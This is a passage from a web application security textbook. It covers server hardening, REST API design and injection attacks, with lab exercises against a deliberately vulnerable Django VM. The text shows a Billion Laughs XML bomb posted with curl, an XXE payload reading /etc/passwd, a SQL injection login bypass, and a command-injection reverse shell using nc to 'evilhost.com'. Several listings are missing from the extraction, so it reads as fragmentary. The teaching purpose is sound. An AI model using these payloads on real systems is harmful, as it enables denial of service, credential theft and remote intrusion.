views.py file. This is illustrated in Listing 5-6. We then set the default
handlers to these functions by adding two lines to the urls.py file. This is
shown in Listing 5-7.
handler404 = views.handler404
handler500 = views.handler500
ERROR HANDLING
145
Chapter 5 Installing and Configuring Services
It doesn’t matter what email address you enter—they are all caught by
MailCatcher. Now visit the preceding URL again and notice the error is no
longer displayed. Visit MailCatcher’s console by pointing your browser at
http://10.50.0.2:1080/. You should see the full error details in the email
sent to the address you specified.
Don’t forget you have to restart Apache first with
coffeeshopsite/coffeeshop/templates
Default Passwords
Routers, access points, webcams, and IoT devices often come with default
passwords. The same is often true of WAFs and web servers, especially
admin consoles and those designed for embedded applications. Database
servers often also have default passwords or absent passwords.
It can be easy to forget to change these, and fortunately for hackers,
tools exist to find services where this has not been done.
Shodan at https://shodan.io is one such service. Figure 5-12 shows
a (redacted) screenshot of a Shodan search for services running on port
146
Chapter 5 Installing and Configuring Services
8081 with username admin and password password. As can be seen, there
were many matches, and the first three at least returned a 200 OK response.
Looking at the Top Products section at the left of the image, we see the
most common responses were from TP-LINK devices, presumably routers,
but also a fair number of Nginx, Apache, and Microsoft IIS web servers.
Django does not preinstall any accounts, admin, or otherwise, and
developers must create them explicitly. Default passwords are therefore
less of an issue.
We will say more about password management in Chapter 9.
5.8 Database Configuration
Web applications often use databases to persist data. If misconfigured,
vulnerabilities can be introduced. In this section, we focus on the
configuration of the database server itself. For SQL injection vulnerabilities
arising from application code, see Chapter 7.
147
Chapter 5 Installing and Configuring Services
148
Chapter 5 Installing and Configuring Services
149
Chapter 5 Installing and Configuring Services
Postgres Configuration
Postgres has its own configuration for controlling which users can
log in from what hosts and with which authentication methods. The
configuration files are
• postgresql.conf
• pg_hba.conf.
listen_addresses = '*'
#listen_addresses = 'localhost'
• TYPE
• DATABASE
• USER
• ADDRESS
150
Chapter 5 Installing and Configuring Services
• AUTH-METHOD
• Optionally, AUTH-OPTIONS
The TYPE column can be local for local connections or host for TCP/
IP connections (either IPv4 or IPv6). It can also be hostssl to accept only
TLS/SSL-encrypted connections or hostnossl to accept only connections
without TLS/SSL. There are also hostgssenc and hostnogssenc for with
and without GSSAPI encryption (which we do not discuss in the book).
The DATABASE field is the name of a database or all for all databases.
The USER field is the Postgres (not OS) user or all for all users.
The ADDRESS field is either a hostname, IP address range (IPv4 or IPv6),
or all. A hostname can be preceded by a dot, for example, .coffeeshop.
com, in which case anything ending in that domain is accepted.
An IPv4 address is the regular four-part address followed by a slash
/ and then a CIDR mask length (the number of bits from the left to treat
at the subnet). For example, 10.50.10.0/24 would match any IP address
beginning in 10.50.10. The address range 127.0.0.1/32 matches only
127.0.0.1.
IPv6 address ranges are similar, but with the colon-separated notation
instead of dot separated. The address range ::1/128 is the IPv6 equivalent
of 127.0.0.1/32.
The AUTH-METHOD field is the authentication method. A full list is in the
Postgres documentation at www.postgresql.org/docs/12/auth-pg-hba-
conf.html, but some common ones are the following:
151
Chapter 5 Installing and Configuring Services
POSTGRES PERMISSIONS
In this exercise, we will experiment with the Postgres pg_hba.conf file in the
Coffeeshop VM.
vagrant ssh
echo $DBOWNERPWD
152
Chapter 5 Installing and Configuring Services
Now switch to the Coffeeshop VM and edit the pg_hba.conf file, for example:
allows MD5-based password login from any host. Remove or comment out
this line and save the file. Restart Postgres with
Edit the pg_hba.conf file again and add a line to allow connections from any
host starting with 10.50.0. Restart the server and test if you can connect
again from CSThirdparty.
13
https://pgadmin.org
153
Chapter 5 Installing and Configuring Services
5.9 Securing the Filesystem
We intentionally expose part of the filesystem so that
• Users can view files from the public HTML path (HTML
files, media, JavaScript, etc.) through a web browser
DocumentRoot /var/www/html
154
Chapter 5 Installing and Configuring Services
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
155
Chapter 5 Installing and Configuring Services
Note that these directories are not exposed to web clients by default:
the <Directory> tag only defines the what the server can access, but they
are still inaccessible via a browser unless mapped to a URL. We do this by
using the DocumentRoot tag or an Alias tag in the site configuration file.
For example, we have the following in our Coffeeshop VM:
Alias /static/ /var/www/coffeeshopsite/coffeeshop/static/
Figure 5-13. Shodan being used to find sites that allow directory
listing on /. IP addresses have been redacted
Any directories that are in the public path should either have an
index.html file or else the directive Options -Index should be included
in the <Directory> block. If it is not, then the user will be able to perform
a directory listing, viewing the directory’s contents. This can expose
vulnerabilities. We looked at Shodan in Section 5.7. Figure 5-13 shows the
output of a Shodan query to find sites that allow directory listing of /.
156
Chapter 5 Installing and Configuring Services
Make sure that any files that are not part of your application are also
not in the public path. For example, old files that are no longer used.
HTML, CSS, media, PHP, and JavaScript files can be found by attackers
even if there are no links to them by using brute-force tools such as
Dirbuster.14
This is also true of URLs, such as REST API calls, that are no longer
needed for the application and development-related directories such as
.git. Be sure to delete debugging URLs from productive systems.
Code Directories
Of course, web applications usually contain code. Web servers should be
configured to only serve code by executing it, not displaying it as plain
text. If users can see the code, they may discover vulnerabilities they can
exploit.
The original way of serving code from a web server is by putting
executables or scripts in a cgi-bin directory. This is configured in
Apache with the <Directory> block, placing a ScriptAlias and Options
+ExecCGI directives within it. If cgi-bin directories are used, care should
be taken that the <Directory> block is set up correctly so that the files
cannot be served as plain text. We won’t discuss CGI further as we usually
use frameworks such as Django with WSGI to execute our code, and CGI is
a rather outdated technology.
Our application uses the WSGI module to serve Python code. The site
configuration file maps our WSGI application to the URL / with the line
WSGIScriptAlias / /var/www/coffeeshopsite/
coffeeshopsite/wsgi.py
14
https://sourceforge.net/projects/dirbuster/
157
Chapter 5 Installing and Configuring Services
Upload Directories
Sometimes, a directory has to be writable so that users can upload files, for
example, uploading images on social media sites. Allowing users to change
the content on your site can introduce vulnerabilities. The following
principles reduce the risk:15
15
www.opswat.com/blog/file-upload-protection-best-practices
158
Chapter 5 Installing and Configuring Services
WSGIScriptAlias / /var/www/coffeeshopsite/
coffeeshopsite/wsgi.py
Alias /static/ /var/www/coffeeshopsite/coffeeshop/static/
159
Chapter 5 Installing and Configuring Services
Secrets
Web applications contain some files with particularly sensitive data, for
example:
• Database passwords
• Private keys
SECRET_KEY = os.environ['SECRET_KEY']
160
Chapter 5 Installing and Configuring Services
5.10 Summary
In this chapter, we looked at how to make our servers and the services that
run on them secure: web servers, databases, and other TCP/IP services.
We looked at how hackers launch man-in-the-middle attacks and how
HTTPS helps prevent them.
Not all protocols come with encryption. We looked at two ways to wrap
unencrypted protocols in TLS/SSL: reverse proxies and SSH tunnels.
Our applications often contain services that are only needed internally
and should not be exposed outside our local network. We looked at two
ways for blocking access to ports: host firewalls and TCP Wrappers.
Finally, we learned how to use database permissions to restrict access
based on IP address, and we looked at techniques for making our servers’
filesystems secure.
In the next chapter, we begin looking specifically at developing web
applications, starting with designing our APIs and endpoints.
161
CHAPTER 6
APIs and Endpoints
In this chapter, we will begin looking at coding web applications, starting
with designing our endpoints: URLs and APIs. These are the building
blocks of a web application. HTTP leaves a number of choices to us: what
request method to use, what response code to return, what format to use
for the request and response body.
We will begin by looking at the anatomy of a URL before exploring
REST APIs. These are a specific type of API that leverages the HTTP
protocol to enable stateless requests to server-side functionality.
A key method for restricting access to server-side functionality is
username and password-based authentication. We will begin looking at
this topic in this chapter (it is covered more fully in Chapter 10) as well as
how to use unit testing to ensure permissions are set up correctly.
We finish the chapter by looking at some specific attacks that exploit
vulnerabilities in APIs: deserialization attacks.
6.1 URLs
The general form of a URL is
schema://user:password@host:port/path?query#fragment
All parts are optional except path. If path begins with a slash / (and
has to if host is present in the URL), then it is an absolute path; otherwise,
it is relative to the URL it is loaded from.
The fragment (the part after the #) is not sent but applied by the
browser. The username and password are placed in a header, which we
discuss in Chapter 10.
If HTTPS is used, the entire request is encrypted. The host and port
are sent unencrypted over the network so that the connection can be
established. The query parameters, username, and password are not.
Despite this, we should not send sensitive data in a GET request. The
reasons are as follows:
6.2 REST APIs
REST APIs (REST stands for Representational State Transfer) provide users
and applications with programmatic access to functionality. Rather than
returning HTML pages, they return data, serialized for transport in some
way, for example, as JSON or XML.
164
Chapter 6 APIs and Endpoints
REST APIs are no different from regular HTTP requests other than the
data type of the body. The same HTTP methods are used (GET, POST, PUT,
etc.) as well as the same response codes (200 OK, 404 Not Found, etc.)
A misconception is that the term “REST” applies to any API that allows
programmatic access to the application over HTTP. However, REST APIs
conform to specific principles and build on the existing meanings of the
HTTP methods and response codes.
By keeping to the correct REST principles, we avoid some common
vulnerabilities. Also, we can use frameworks that take care of the
mechanics of REST, allowing us to focus on business logic. We write less
code, and it is clearer. As we have already seen, less code means fewer
vulnerabilities, and clearer code means we are more likely to spot them.
REST APIs operate on items and collections. An item is a single
entity, such as an address. A collection is a group of items, such as an
address book.
GET Requests
REST GET requests can be called on an item, for example:
http://api.example.com/addresses/100
http://api.example.com/addresses
165
Chapter 6 APIs and Endpoints
The return status should be 200 OK if the requested item exists, with
the item or collection in the body, and 404 Not Found otherwise.
POST Requests
POST is for creating an item. It is therefore only called on collections. It is
not idempotent: if you call it more than once, a new item will be created
each time. It should not be cached.
Returning a response body is optional. You may return the ID of
the newly created item, in which case the response code should be 201
Created or 200 OK. If you do not return the ID or item, return a response
code 204 No Content.
PUT Requests
PUT is for updating an existing item. It is therefore only called on an item.
PUT requests are not cached. To see why, imagine you update a record, say,
an address, using PUT. Then, another user updates the same record. If you
want to change it back, you would issue the same PUT request as before. If
it were cached, it would not execute on the server.
PUT is regarded as idempotent, as calling it multiple times has the same
effect. It should return 200 OK if the response contains the ID or item, 204
No Content if it does not, or 404 Not Found if the record does not exist.
PATCH Requests
PATCH, like PUT, updates a record, so it is called on an item. However, PUT
is a full update, whereas PATCH is a partial update. You only supply PATCH
with the data that are changing, not the whole record.
Unlike PUT, PATCH is not idempotent. To see why, imagine we have the
following address in our database:
166
Chapter 6 APIs and Endpoints
Column Value
Say we use PATCH to set the postcode to 60600. If we use JSON, the
request might look like
{
"Postcode": "60600"
}
Column Value
Now imagine another user changes the state to OR and we make our
PATCH call again to set the postcode to 60600. Now the record is
Column Value
167
Chapter 6 APIs and Endpoints
Our two PATCH requests do not result in the same state in the database,
so PATCH is not idempotent.
This is not the case with PUT as we supply all the records in the request.
PATCH should return 200 OK if the response contains the ID or item, 204
No Content if it does not, or 404 Not Found if the record does not exist.
DELETE Requests
DELETE removes an item, so it is called on items, not collections. It is
normally regarded as idempotent as deleting a record a number of times
makes the database look the same. However, deleting a nonexistent record
results in a 404 Not Found message, so arguably it is not idempotent at all.
DELETE is not cacheable as we might wish to call DELETE, then a POST to
create the item again, then another DELETE.
DELETE should return 200 OK if the response contains a body (e.g., a
status message or the ID of the deleted object). It should return 204 No
Content if the response does not contain a body and 404 Not Found if the
item does not exist.
A summary of REST methods is given in Table 6-1.
168
Chapter 6 APIs and Endpoints
169
Chapter 6 APIs and Endpoints
class AddressSerializer(serializers.ModelSerializer):
class Meta:
model = Address
fields = ['pk', 'address1', 'address2', 'city',
'postcode', 'country']
We only include the fields we want to send between the client and
server. We do not include user as we take that from the logged-in user.
1
http://django-rest-framework.org
170
Chapter 6 APIs and Endpoints
Listing 6-2. REST API view set for the Address model, in views.py
class AddressViewSet(viewsets.ModelViewSet):
def get_queryset(self):
return Address.objects.filter(user=self.request.user)
serializer_class = AddressSerializer
permission_classes = [permissions.IsAuthenticated,
OwnsAddress]
171
Chapter 6 APIs and Endpoints
Lines 8–9 overwrite the default item creation function. We do this to set
the user attribute to the person who is logged in, because we are not taking
it from the serialized data stream.
We have two permissions classes defined (line 6). The permissions.
IsAuthenticated permission comes with the REST framework. We defined
the other ourselves, in permissions.py. It is shown in the next listing.
class OwnsAddress(BasePermission):
def has_object_permission(self, request, view, obj):
return obj.user == request.user
router = routers.DefaultRouter()
router.register(r'addresses', views.AddressViewSet,
basename="addresses")
urlpatterns = [
...
path('api/', include(router.urls)),
path('api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
]
172
Chapter 6 APIs and Endpoints
173
Chapter 6 APIs and Endpoints
For now, log in as user bob using option 1. The password is in the
coffeeshop/secrets/config.env file. Look for DBUSER1PWD.
Create a new address by filling out the form below the address book and
clicking on POST.
174
Chapter 6 APIs and Endpoints
http://10.50.0.2/api/addresses/pk
taking pk from the address you want to view from the list. For example, you
can view the first (and only) address in bob’s address book by visiting
http://10.50.0.2/api/addresses/1
You can update the address by entering data in the form below it and clicking
the PUT button (thereby issuing a PUT request). You can delete the address by
clicking the DELETE button (a DELETE request).
@login_required
def basket(request):
cart = None
...
175
Chapter 6 APIs and Endpoints
If a user is logged in, Django executes the function. If not, the user is
redirected to the login page and sent back upon successful login. Django
also has a @permission_required decorator that returns an error if the
logged-in user doesn’t have the stated permission.
Using decorators (or permission_classes in REST view classes)
adds clarity to your code, making it easier to spot incorrect authorization
settings.
One common mistake is to not apply permission checks on URLs
called internally. For example, imagine a user has entered form data. The
Submit button sends them to the URL /submitform. Once the form has
been processed, the user is redirected to a URL /viewdata that displays the
data they submitted. The /viewdata function needs the same permission
checks as /submitform; otherwise, a malicious user could visit it directly.
In case errors do slip through, we can unit test permissions. Good
developers unit test the functionality of their code but can forget to test
that the code is callable by valid users and not callable by invalid ones.
Imagine a site that has a URL /protected/. This URL should only be
available to logged-in users. As well as testing that the code that serves
/protected/ actually performs the correct processing, we should also check
that it can be called when a user is logged in and cannot be called when
there is no logged-in user. We can put the following in the tests.py file:
class SimpleTest(TestCase):
def setUp(self):
self.factory = RequestFactory()
176
Chapter 6 APIs and Endpoints
self.testuser = User.objects.create_user(
username='testuser',
email='[email protected]',
password='testpass123')
def test_authorized(self):
url = '/protected/'
request = self.factory.get(url)
request.user = self.testuser
myview, myargs, mykwargs = resolve(url)
response = myview(request)
self.assertEqual(response.status_code, 200)
def test_unauthorized(self):
url = '/protected/'
request = self.factory.get(url)
request.user = AnonymousUser()
myview, myargs, mykwargs = resolve(url)
response = myview(request)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['location'], '/account/
login/?next=/protected/')
It will create a fresh, empty database, with the schema but nothing
else. Django runs each class extending TestCase and, within those, every
function beginning in test_. The setUp() function is called before each
test. We use this to create a test user.
The test_authorized() function first creates a request object for the
URL we are testing, at line 15. We set the user to our test user as we want
to confirm that the page is accessible when a user is logged in. We next
resolve the URL into the function that handles it (line 17) so that we can
177
Chapter 6 APIs and Endpoints
call it (line 18). If all went well, Django should return the HTML for the
basket page and a response code of 200 OK. We are not checking the HTML
of the response in this case, only that the response code is 200. We do this
with an assert at line 19.
The test_unauthorized() function tests that the view is inaccessible
when a user is not logged in. We put the request’s user in the
unauthenticated state by setting it to AnonymousUser() at line 23.
Line 26 tests that the response code is 302 Found. We do not test that it
equals 403 Forbidden. The reason is the @login_required decorator we
use in Django redirects the user to the login page, rather than returning
403 Forbidden. If testing a REST API call, you assert the response code is
403, not 302, as it does not perform a redirect.
At line 27, we also check the redirect location does in fact go to the
login page.
One final point to note before we try this in an exercise is how Django
creates the test database. It uses the same database engine configured in
the DATABASES variable in settings.py. It creates a new database with
the same name but prefixed with test_. This means the database user
Django is configured with has to have database creation permissions.
This is undesirable in production settings, so we need to create separate
configuration for development. Our alternative is to change the database
engine to SQLite just for tests. We do this with the following lines in
settings.py
178
Chapter 6 APIs and Endpoints
In this exercise, we will create a test case for the /basket/ URL like the one
in Listing 6-5. If you like, you can try writing it yourself based on this listing. As
in that case, you will want to test the response code in the second test in 302
and test the location has an appropriate value.
/vagrant/snippets/unittests
6.4 Deserialization Attacks
In Section 6.2, we used JSON for our request and response bodies. JSON
has become a popular serialization format for a number of reasons:
1. It easy for humans to read and edit with standard
editors.
3. It is fairly compact.
179
Chapter 6 APIs and Endpoints
XML Attacks
XML is a flexible data format that contains features developers are
sometimes unaware of and can be exploited.
A famous XML vulnerability is known as the Billion Laughs attack.
The name comes from its original example. XML supports a directive
called <!ENTITY>. It allows the author of the XML to define a shortcut. For
example, the author could define
Then, instead of writing Microsoft Corp in the XML body, the author
just has to write &ms;.
Unfortunately, entities are allowed to be recursive: an entity can refer
to another entity. This feature is exploited by the Billion Laughs attack.
Consider the following XML document.
<?xml version="1.0"?>
<!DOCTYPE hahas [
<!ENTITY haha "haha">
<!ENTITY haha2 "&haha;&haha;&haha;&haha;&haha;&haha;&haha;
&haha;&haha;&haha;">
<!ENTITY haha3 "&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;
&haha2;&haha2;&haha2;&haha2;">
180
Chapter 6 APIs and Endpoints
Line 3 defines a macro &haha; that just expands to the text haha. Line 4
defines a macro &haha2; that expands to ten &haha;’s, in other words, ten
haha’s. Line 5 expands to 10 &haha2;’s, in other words 100 haha’s, and so
on, up to &haha9;.
As a result, placing a single &haha9; in the last line of the document
results in the insertion of one billion haha’s. A file that has taken no
more than 1K of text for the attacker has consumed 3GB of memory on
the server.
Of course, no developer would write such code in their own
application. However, if server-side code to parse XML exists and entity
expansion is allowed, as is the case in many XML parsers, then an attacker
can craft a request that results in a Denial of Service.
The entity tag also supports a parameter called SYSTEM. This expands to
the contents of a URL. It can be exploited by the XML External Entity (XXE)
attack, resulting in file disclosure if the expanded XML is visible to the attacker.
Listing 6-7 displays the Unix password file.
181
Chapter 6 APIs and Endpoints
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
function getStockLevel() {
const productId = "{{ product.id }}";
fetch("{% url 'stocklevel' %}", {
method: 'POST',
headers: {
'Content-Type': 'application/xml'
},
body: "<product>" + productId + "</product>"
})
.then(
function(response) {
if (response.status == 200) {
response.json().then(function(data) {
182
Chapter 6 APIs and Endpoints
if (data.quantity == 0)
$('#stocklevel').html('<p class="text-
danger">Out of Stock</p>');
else
$('#stocklevel').html('<p class="text-
success">' + data.quantity
+ ' in stock</p>');
}
);
}
}
)
}
Start an SSH session in each of our two VMs with vagrant ssh. In the
Coffeeshop VM, run the command
top
The API endpoint /stocklevel/ takes the product ID in the XML body. You
should see a JSON return string of
{"quantity": 10}
183
Chapter 6 APIs and Endpoints
cd /vagrant/snippets
cat hundred_million_laughs.xml | \
curl -X POST --data-binary @- http://10.50.0.2/stocklevel/
Now switch back to your Coffeeshop VM and take a look at top. At the
beginning of the list, you will see a Python process now taking close to 40% of
the memory (in the VirtualBox version, a smaller percentage for the Docker but
only because the memory allocated to the container is higher).
The API call will fail with a 500 Server Error response code, but that is
not the object of the attack. Even after the call ends, the Python process is
still consuming over a third of the memory. Adding the extra haha line would
increase this by a factor of ten.
184
Chapter 6 APIs and Endpoints
185
Chapter 6 APIs and Endpoints
6.5 Summary
In this chapter, we looked at how to safely design our applications
endpoints: when to use POST vs. GET and how to build a safe REST API. We
saw how adhering to the established REST standards and using existing
frameworks can make your code safer. We also looked at some common
deserialization vulnerabilities that enable an attacker to exploit poor
communication formats between a client and server, in particular unsafe
use of XML.
We focussed on URLs. In the next chapter, we will look at
vulnerabilities that can be introduced when our application accepts input
from a user, in any of its forms. We will look at techniques to remove these
vulnerabilities.
186
CHAPTER 7
Cookies and
User Input
In this chapter, we will look at one of the most common sources of
vulnerabilities in a web application: user input. It can pose a threat
when that input is either displayed in web pages, stored on the server, or
executed.
We will begin by looking in some detail at how cookies are set by a web
server and how they are used by the browser. Incorrect cookie settings are
a frequent source of vulnerabilities. We will then examine some common
user input-oriented vulnerabilities and how to fix them: injection, server-
side request forgery, and cross-site scripting.
into performing some action, usually using tools already on their device
such as their web browser. Poor handling of user input can lead to both
types of attack.
User input includes
• Cookies
While not exactly user input, JavaScript, even when sent from your own
site, can pose the same threats.
We looked at JSON and XML data in the last chapter. We will look at the
remainder in the sections that follow.
7.2 Cookies
Cookies are key/value pairs sent from the server to the client in a response
header. The client, for example, a web browser, stores them in a file and
sends them to the server in a request header if certain conditions are met.
Chrome and Firefox both store cookies in a SQLite database. SQLite
databases are themselves a single file. Cookies are set by the server with
the Set-Cookie header:
Set-Cookie: cookie-name=cookie-settings
188
Chapter 7 Cookies and User Input
where
An example is
Set-Cookie: lang=en
On subsequent visits to the same site, the browser would send the
following back to the server in the request headers:
Cookie: lang=en
Expires=datetime Do not send the cookie after the given time. The value should
be given as day, month year hour:min:sec TZ.
Max-Age=secs Do not send the cookie after the given number of seconds
have elapsed.
Domain=domain Only send the cookie for given domains.
Path=path Only send the cookie for URLs under the named path
(including subpaths).
Secure Only send the cookie over HTTPS.
HttpOnly Do not allow the cookie to be read by JavaScript code.
SameSite=value Controls how the cookie is sent in cross-site requests.
Described in the following text.
If the browser had multiple cookies for the same site, they would be
concatenated with semicolons, for example:
189
Chapter 7 Cookies and User Input
Domain and Path
By default, the cookie is sent for all URLs on the host it was sent from (based on
the host in the URL) and to no other hosts, also not sending it to subdomains.
If the Domain attribute is set, the cookie is sent to that domain and
subdomains. For example, if Domain is set to example.com, it is sent to
example.com, www.example.com, etc. If it is set to www.example.com, it is
only sent to that host.
If Path is set, it is only sent for URIs under that path. For example, if
Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the
cookie is sent to all URIs.
190
Chapter 7 Cookies and User Input
<script>
alert(document.cookie)
</script>
will not display the cookie if HttpOnly was set. We will return to this later in
the chapter when we talk about cross-site scripting.
191
Chapter 7 Cookies and User Input
Session ID Cookies
Session ID cookies are a common way for websites to keep a user logged
in between requests. As HTTP is stateless, the only way to associate a user
with a request is to store something on both the client and server that can
be matched against each other.
192
Chapter 7 Cookies and User Input
193
Chapter 7 Cookies and User Input
Let us look at the situations where the cookie will be sent by the
browser:
In all cases, the site will receive the session ID, and the user will be
considered logged in without having to enter a username and password.
Now consider what happens if SameSite is set to Lax. The cookie will
only be sent
194
Chapter 7 Cookies and User Input
In all these cases, the user will be considered logged in. If the user
visits by following a link on another site, the user will not be logged in and
will be prompted for a username and password.
Finally, if SameSite is set to Strict, the cookie will only be sent if the
user follows a link from a coffeeshop.com page to another page on the
same domain. In all other cases, the user will have to log in again.
Setting the same site value inappropriately can lead to certain attacks
such as cross-site request forgery. We will investigate these in Chapter 8.
7.3 Injection Attacks
Injection refers to vulnerabilities where a user can submit input that is
executed in some way on the server. If an input field is not validated, an
attacker can insert malicious code or data. Usually, the user-entered code
is concatenated with code on the server, rather than being a complete
command in itself.
The most well-known injection vulnerability is SQL injection. The most
common source is form fields (e.g., username/password fields, search
fields), but the vulnerability can exist anywhere where data is captured
from the client and executed on the server in a SQL query. Other places
can include GET parameters or REST API calls.
Other types of injection include command injection, where OS
commands are executed (e.g., Bash commands executed through Python’s
os.system() function), and code injection (e.g., executing Python code
through its eval() function). Cross-site scripting, which is effectively
injecting HTML and JavaScript code, is discussed in the next chapter.
195
Chapter 7 Cookies and User Input
7.4 SQL Injection
Imagine a web page that asks for a user to log in by entering a username
and password into an HTML form:
The handler for the /login URL has the following code for checking if
the credentials are correct:
password_hash = hashlib.md5(password).hexdigest()
sql = "select user_id from User where username = '" + username \
+ "' and password = '" + password_hash + "'"
with connection.cursor() as cursor:
cursor.execute(sql)
row = cursor.fetchone()
...
Here, username and password are taken from the two form input fields.
If the user enters a username and password that match an entry in the
User table, a row will be returned by the SQL query, and the user will be
logged in.
Let’s say an attacker enters the following in the username field and
some random text (say, xxx) in the password field:
bob'--
196
Chapter 7 Cookies and User Input
When the server code is executed, the sql variable will contain the
following (bold indicates the text that the user entered):
So long as the user bob exists, a row will be returned regardless what
the password is. The attacker will be logged in.
If the attacker did not know a valid username, they could enter the
following for the username:
Ignoring the part after the comment, the SQL engine will execute
197
Chapter 7 Cookies and User Input
The semicolon ends a SQL statement and begins a new one. Not only
would the attacker be logged in as the first user in the order rows are
returned but would also be able to create their own user. Similarly, the
attacker could delete or alter rows.
Schema Discovery
Each of the preceding examples required that the attacker know the
column names in the user table, though username and password would
have been obvious guesses. The last example required the attacker to
know that the user table is called User. In Django, this is not the case; it is
auth_user. The attacker could of course try many different names (auth_
user is also a sensible guess, as many applications are built with Django).
However, an attacker could also query the schema to find out what the
table is called.
Imagine a search form that looks something like the following:
Now imagine the attacker enters the following in the search field:
198
Chapter 7 Cookies and User Input
The union keyword joins two select queries together. The only
requirement is that the number and types of the selected columns match.
In the server code, two varchar columns, name and description, are
selected. The attacker ensures they select two columns of type varchar.
The catalog.pg_tables table in Postgres contains the names of all
the tables in the database. Fortunately, it has two useful varchar columns:
schemaname and tablename.
Most likely, no results will be returned by the actual search string xxx.
However, the other select statement will return all the schema and table
names in the database as part of the search results.
Now the attacker does not have to know what the user table is called.
They can get Postgres to tell them. They do have to know that Postgres is
the database engine. They could just try the correct syntax for all popular
databases—there are not that many. Alternatively, they could run nmap.
Recall from Chapter 5 that nmap revealed that Postgres was running.
The attacker would still have to know that the search query selected
two columns and they were both varchar’s. The format of the search results
might give them a hint. If not, they could use trial and error. Databases don’t
have so many data types, and they could try them exhaustively:
• int
• float
• varchar
• int, int
• int, float
• int, varchar
and so on. If the query included a float, say, they would be unable to find
a matching column in pg_catalog.pg_tables. However, they could select
a hard-coded value:
199
Chapter 7 Cookies and User Input
Once they find a query that works, they can run a few more: one to get
the schema names, another to get the column names, and so on. This is
another reason why detailed error messages should not be displayed for
users—it can reveal the schema to attackers. Hiding errors may not prevent
a determined attack, but the attacker will need more queries, which may
be noticed when monitoring logs or traffic.
Of course our attacker would probably not enter all these queries
manually. They would script them, or use an existing tool. One open
source tool is sqlmap.1
%00'
may well prevent the quote deletion from succeeding. Hackers also replace
a single quote with its ASCII value %27 to avoid detection.
1
https://sqlmap.org
200
Chapter 7 Cookies and User Input
A far safer defense is to not use string concatenation at all. Instead, use
prepared statements.
Prepared statements are a feature of SQL engine APIs. Placeholders
are inserted into the SQL query where user-provided data is expected.
The statement is compiled, and the user input is passed as a parameter to
the execution function along with the compiled SQL statement. They also
improve performance, especially if the query is reused, as it only needs to
be compiled once.
The syntax varies between SQL libraries. Our VMs use psycopg2. An
example prepared statement is as follows:
201
Chapter 7 Cookies and User Input
The psycopg2 package makes it a bit harder for us when we want to use
a like clause, for example:
SQL INJECTION
/vagrant/snippets/injection.txt
The Coffeeshop application has a SQL vulnerability in the search function. Visit
the Coffeeshop URL at
http://10.50.0.2
202
Chapter 7 Cookies and User Input
and enter a search term (e.g., dark). Now take a look at the code (search()
in views.py). The vulnerability exists because of this line:
We will exploit the vulnerability by using the search term to display all
usernames and hashed passwords from the auth_user table (columns
username and password).
The query will be a bit more complex than the previous examples because we
have an open parenthesis, which must be closed to make the SQL valid. Enter
the following query into the search box:
Our union has to have matching data types for the selects on either side.
As the code selects an integer, two strings, and a float, we have to select the
same after the union. As the auth_user table has no float columns, we
select a constant value.
Press Enter to run the query. You should now be able to visit the admin
page http://10.50.0.2/admin and log in as bob (his username is in
coffeeshop.com/secrets/config.env).
203
Chapter 7 Cookies and User Input
To fix the vulnerability, we just turn the SQL statement into a prepared
statement. Edit
vagrant/coffeeshopsite/coffeeshop/views.py
204
Chapter 7 Cookies and User Input
to pick up the code changes. If you have errors, they will be in /var/log/
apache2/error.log.
After fixing the vulnerability, confirm that a legitimate search still works and
that SQL injection does not.
7.5 Command Injection
Command injection vulnerabilities are similar to SQL injection. The
difference is that user-supplied text is concatenated with a shell command
that is executed on the server, rather than SQL code that is executed by the
database.
Imagine an application that scales an image by a percentage supplied
by the user:
By now, you probably recognize why a vulnerability exists. If, for the
scale term, an attacker entered
then the server would execute the scale command as expected but would
then print out the contents of the system password file. The double
ampersand is a Bash and and is an effective way of joining two commands
into a single command. The hash is the comment character. If the output
were captured and displayed in the response, the attacker would be able to
view the system users.
In this example, the output is not captured. It is, however, still a useful
vulnerability for an attacker. Consider the following value for the scale term:
205
Chapter 7 Cookies and User Input
nc -l evilhost.com 9000
206
Chapter 7 Cookies and User Input
Back Doors
A reverse shell is an example of a back door: an entry point an attacker
uses that was not intended by the developer. In our example, the developer
expects connections over HTTP and HTTPS on ports 80 and 443, but the
attacker has created a Bash entry point on port 9000.
A Bash shell using nc is useful for an attacker and dangerous for the
application. However, it is still rather limiting: the attacker must be present
to interactively operate the shell, it only accepts one connection at a time,
and file upload and download are difficult to enact.
Fortunately for attackers, other back doors exist. It is not hard to see
how nc could be replaced by a more sophisticated application that spawns
a new thread for each connection and that automates commands rather
than requiring them to be entered interactively.
Also fortunately for attackers, tools already exist with more features.
Metasploit2 is a popular framework with many exploits built in and is
also extensible. Metasploit contains exploits and payloads. Exploits
are modules that take advantage of a vulnerability. One example is
Metasploit’s web_delivery exploit, which takes advantage of a vulnerable
web form.
Once the exploit has been executed, Metasploit delivers a payload.
The user can select from a number that are supported by each exploit. A
Bash reverse shell over TCP (such as the one we showed in our example)
is one option, but Metasploit makes an additional 20 available for the web_
delivery exploit.
Metasploit also has staged payloads. These are delivered in parts.
Once the exploit is executed, Meterpreter delivers a small payload whose
purpose is to download a larger one with more features. The python/
meterpreter/reverse_tcp payload in Metasploit has, for example, file
upload and download commands.
2
https://metasploit.com
207
Chapter 7 Cookies and User Input
COMMAND INJECTION
http://10.50.0.2
and click Contact in the menu bar at the top. You will have to log in if you have
not done so already.
http://10.50.0.2:1080
208
Chapter 7 Cookies and User Input
vagrant ssh
nc -l 9000
We will initiate a reverse shell in the same way as the example shown
previously, using the vulnerable contact form. Enter the following in the
message body:
Take a look at the code in the contact() function in views.py to see how
this works. Execute the code by sending the email.
whoami
ls
ps x
cat /etc/passwd
